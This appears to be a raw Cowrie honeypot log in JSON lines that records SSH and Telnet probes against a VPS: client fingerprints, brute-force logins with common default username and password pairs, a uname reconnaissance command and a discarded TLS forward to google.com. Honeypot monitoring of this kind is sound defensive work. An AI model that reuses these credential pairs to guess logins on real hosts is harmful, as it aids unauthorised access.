{"eventid":"cowrie.direct-tcpip.data","dst_ip":"google.com","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03-u\\xc5<v\\xba\\r\\x81x\\xf3g;\\xb3\\x91\\xa0\\xdf\\xebL\\x14x\\xd7\\x9c\\xd1\\xd8\\xf7 \\xb9\\xe5'c\\x1dD \\xcf\\x174<V\\xca(\\xc6\\x06\\x12\\x16\\xcb\\x90\\x03\\xa8;\\xb5\\x17\\xa7\\x17\\xae\\xe1\\xd1\\xc7\\xd6\\xa3}\\xd2De\\xb7\\x9c\\x00>\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\x00\\x9f\\xcc\\xa9\\xcc\\xa8\\xcc\\xaa\\xc0+\\xc0/\\x00\\x9e\\xc0$\\xc0(\\x00k\\xc0#\\xc0'\\x00g\\xc0\\n\\xc0\\x14\\x009\\xc0\\t\\xc0\\x13\\x003\\x00\\x9d\\x00\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01u\\x00\\x00\\x00\\x0f\\x00\\r\\x00\\x00\\ngoogle.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0e\\x00\\x0c\\x02h2\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x000\\x00.\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x02\\x03\\x03\\x01\\x02\\x01\\x03\\x02\\x02\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\t\\x08\\x03\\x04\\x03\\x03\\x03\\x02\\x03\\x01\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 <r*\\xe1]\\xb5?\\x05\\xdb\\x9b\\xd1\\x9396\\xf0)\\x0cM\\xa0T\\x86A\\x16<\\x12`y[%\\x82\\xca!\\x00\\x15\\x00\\xb7\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to google.com:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03-u\\xc5<v\\xba\\r\\x81x\\xf3g;\\xb3\\x91\\xa0\\xdf\\xebL\\x14x\\xd7\\x9c\\xd1\\xd8\\xf7 \\xb9\\xe5'c\\x1dD \\xcf\\x174<V\\xca(\\xc6\\x06\\x12\\x16\\xcb\\x90\\x03\\xa8;\\xb5\\x17\\xa7\\x17\\xae\\xe1\\xd1\\xc7\\xd6\\xa3}\\xd2De\\xb7\\x9c\\x00>\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\x00\\x9f\\xcc\\xa9\\xcc\\xa8\\xcc\\xaa\\xc0+\\xc0/\\x00\\x9e\\xc0$\\xc0(\\x00k\\xc0#\\xc0'\\x00g\\xc0\\n\\xc0\\x14\\x009\\xc0\\t\\xc0\\x13\\x003\\x00\\x9d\\x00\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01u\\x00\\x00\\x00\\x0f\\x00\\r\\x00\\x00\\ngoogle.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0e\\x00\\x0c\\x02h2\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x000\\x00.\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x02\\x03\\x03\\x01\\x02\\x01\\x03\\x02\\x02\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\t\\x08\\x03\\x04\\x03\\x03\\x03\\x02\\x03\\x01\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 <r*\\xe1]\\xb5?\\x05\\xdb\\x9b\\xd1\\x9396\\xf0)\\x0cM\\xa0T\\x86A\\x16<\\x12`y[%\\x82\\xca!\\x00\\x15\\x00\\xb7\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T19:54:28.003148Z","src_ip":"185.220.101.97","session":"a273f695dc53"}
{"eventid":"cowrie.session.closed","duration":"20.1","message":"Connection lost after 20.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:54:28.135408Z","src_ip":"185.220.101.97","session":"a273f695dc53"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36344,"dst_ip":"1.2.3.4","dst_port":22,"session":"6003a332cde1","protocol":"ssh","message":"New connection: 212.227.235.229:36344 (1.2.3.4:22) [session: 6003a332cde1]","sensor":"my-vps","timestamp":"2025-08-26T19:54:40.938961Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:54:42.299383Z","src_ip":"212.227.235.229","session":"6003a332cde1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:54:42.300961Z","src_ip":"212.227.235.229","session":"6003a332cde1"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":49796,"dst_ip":"1.2.3.4","dst_port":22,"session":"7fd11c213d75","protocol":"ssh","message":"New connection: 217.154.1.158:49796 (1.2.3.4:22) [session: 7fd11c213d75]","sensor":"my-vps","timestamp":"2025-08-26T19:54:43.437128Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:54:43.438364Z","src_ip":"217.154.1.158","session":"7fd11c213d75"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:54:43.452168Z","src_ip":"217.154.1.158","session":"7fd11c213d75"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q@W3e4r","message":"login attempt [root/!Q@W3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:54:43.503288Z","src_ip":"217.154.1.158","session":"7fd11c213d75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:54:43.554452Z","src_ip":"217.154.1.158","session":"7fd11c213d75"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:54:43.555576Z","src_ip":"217.154.1.158","session":"7fd11c213d75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:54:43.572143Z","src_ip":"217.154.1.158","session":"7fd11c213d75"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:54:43.573576Z","src_ip":"217.154.1.158","session":"7fd11c213d75"}
{"eventid":"cowrie.login.success","username":"root","password":"616161","message":"login attempt [root/616161] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:54:46.103108Z","src_ip":"212.227.235.229","session":"6003a332cde1"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:54:46.791774Z","src_ip":"212.227.235.229","session":"6003a332cde1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:54:53.494014Z","src_ip":"212.227.125.160","session":"0077b54f1862"}
{"eventid":"cowrie.session.closed","duration":180.18579006195068,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:54:53.500781Z","src_ip":"212.227.125.160","session":"0077b54f1862"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":35474,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b943b5c1d4b","protocol":"ssh","message":"New connection: 217.154.1.158:35474 (1.2.3.4:22) [session: 7b943b5c1d4b]","sensor":"my-vps","timestamp":"2025-08-26T19:55:01.014423Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:55:01.015966Z","src_ip":"217.154.1.158","session":"7b943b5c1d4b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:55:01.031830Z","src_ip":"217.154.1.158","session":"7b943b5c1d4b"}
{"eventid":"cowrie.login.failed","username":"centos","password":"centos","message":"login attempt [centos/centos] failed","sensor":"my-vps","timestamp":"2025-08-26T19:55:01.080367Z","src_ip":"217.154.1.158","session":"7b943b5c1d4b"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:55:02.100200Z","src_ip":"217.154.1.158","session":"7b943b5c1d4b"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":51894,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5aa7f3ab782","protocol":"ssh","message":"New connection: 199.195.248.191:51894 (1.2.3.4:22) [session: f5aa7f3ab782]","sensor":"my-vps","timestamp":"2025-08-26T19:55:06.153254Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:55:06.155113Z","src_ip":"199.195.248.191","session":"f5aa7f3ab782"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:55:06.256214Z","src_ip":"199.195.248.191","session":"f5aa7f3ab782"}
{"eventid":"cowrie.login.failed","username":"operator","password":"operator123","message":"login attempt [operator/operator123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:55:06.666170Z","src_ip":"199.195.248.191","session":"f5aa7f3ab782"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:55:07.755795Z","src_ip":"199.195.248.191","session":"f5aa7f3ab782"}
{"eventid":"cowrie.session.connect","src_ip":"91.238.181.94","src_port":28139,"dst_ip":"1.2.3.4","dst_port":23,"session":"e246d2d3b026","protocol":"telnet","message":"New connection: 91.238.181.94:28139 (1.2.3.4:23) [session: e246d2d3b026]","sensor":"my-vps","timestamp":"2025-08-26T19:55:10.725361Z"}
{"eventid":"cowrie.session.closed","duration":0.0011250972747802734,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:55:10.726384Z","src_ip":"91.238.181.94","session":"e246d2d3b026"}
{"eventid":"cowrie.session.connect","src_ip":"91.238.181.94","src_port":28348,"dst_ip":"1.2.3.4","dst_port":23,"session":"655fee839934","protocol":"telnet","message":"New connection: 91.238.181.94:28348 (1.2.3.4:23) [session: 655fee839934]","sensor":"my-vps","timestamp":"2025-08-26T19:55:10.749975Z"}
{"eventid":"cowrie.session.closed","duration":0.02686309814453125,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:55:10.776771Z","src_ip":"91.238.181.94","session":"655fee839934"}
{"eventid":"cowrie.session.connect","src_ip":"91.238.181.94","src_port":28779,"dst_ip":"1.2.3.4","dst_port":23,"session":"0502a1ad63ff","protocol":"telnet","message":"New connection: 91.238.181.94:28779 (1.2.3.4:23) [session: 0502a1ad63ff]","sensor":"my-vps","timestamp":"2025-08-26T19:55:10.801709Z"}
{"eventid":"cowrie.session.closed","duration":0.025757312774658203,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:55:10.827377Z","src_ip":"91.238.181.94","session":"0502a1ad63ff"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":50006,"dst_ip":"1.2.3.4","dst_port":22,"session":"c37e5a3fbb8b","protocol":"ssh","message":"New connection: 217.154.1.158:50006 (1.2.3.4:22) [session: c37e5a3fbb8b]","sensor":"my-vps","timestamp":"2025-08-26T19:55:18.584030Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:55:18.584898Z","src_ip":"217.154.1.158","session":"c37e5a3fbb8b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:55:18.599017Z","src_ip":"217.154.1.158","session":"c37e5a3fbb8b"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat123","message":"login attempt [tomcat/tomcat123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:55:18.644359Z","src_ip":"217.154.1.158","session":"c37e5a3fbb8b"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:55:19.660898Z","src_ip":"217.154.1.158","session":"c37e5a3fbb8b"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":35244,"dst_ip":"1.2.3.4","dst_port":22,"session":"995b10529a00","protocol":"ssh","message":"New connection: 217.154.1.158:35244 (1.2.3.4:22) [session: 995b10529a00]","sensor":"my-vps","timestamp":"2025-08-26T19:55:36.020606Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:55:36.022585Z","src_ip":"217.154.1.158","session":"995b10529a00"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:55:36.035223Z","src_ip":"217.154.1.158","session":"995b10529a00"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql","message":"login attempt [mysql/mysql] failed","sensor":"my-vps","timestamp":"2025-08-26T19:55:36.091376Z","src_ip":"217.154.1.158","session":"995b10529a00"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:55:37.109427Z","src_ip":"217.154.1.158","session":"995b10529a00"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":11905,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd5f6766cc7c","protocol":"ssh","message":"New connection: 212.227.125.160:11905 (1.2.3.4:22) [session: dd5f6766cc7c]","sensor":"my-vps","timestamp":"2025-08-26T19:55:38.534651Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:55:38.535842Z","src_ip":"212.227.125.160","session":"dd5f6766cc7c"}
